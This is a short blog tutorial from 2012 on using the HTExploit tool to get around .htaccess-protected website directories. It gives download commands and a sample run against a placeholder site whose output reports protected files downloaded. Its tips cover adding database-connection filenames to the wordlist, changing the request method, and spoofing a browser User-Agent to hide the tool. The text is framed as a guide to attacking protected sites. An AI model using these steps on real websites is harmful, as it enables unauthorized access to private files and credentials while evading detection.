Aug 022012
 

Why not write a little tutorial how to use the new tool discovered at Blackhat 2012 HTExploit (http://www.mkit.com.ar/labs/htexploit/).

Requirements: Linux + Python + wget

Lets get the tool and extract it:

wget -c http://www.mkit.com.ar/labs/htexploit/files/source/HTExploit_v0.7b.tar.gz
tar xvfp HTExploit_v0.7b.tar.gz
cd HTExploit_v0.7b

Now if the .htaccess protected website you want to attack is http://example.com/secure/ you will have to type:

sheeva :/tmp/HTExploit_v0.7b# ./htexploit -u http://example.com/secure/

| | __ __| ____| | _) |
| | | __| \ \ / __ \ | _ \ | __|
___ | | | ` < | | | ( | | |
_| _| _| _____| _/\_\ .__/ _| \___/ _| \__|
_| v0.7b

[+] http://example.com/secure seems exploitable. Enjoy :)

Would you like to run the ‘full’ scan module? [Y/n]

[+] Full Scan Completed.
[+] 6 files were downloaded, out of 762 (0% success rate). Report was saved in ‘/tmp/HTExploit_v0.7b/htexploit-91450’

sheeva :/tmp/HTExploit_v0.7b#

Tips:

If you want to add custom files to the Wordlist (like connect.php or dbconnection.php), add them to the file in “res/Fulllist”. If you want to change the request method (POTATO by default), edit it in “lib/Conn.py”. Further I would change the User-Agent from Python X.X to something like Mozilla or Chrome. Edit “lib/Conn.py” and add

opener.addheaders = [(‘User-agent’, ‘Mozilla/5.0’)]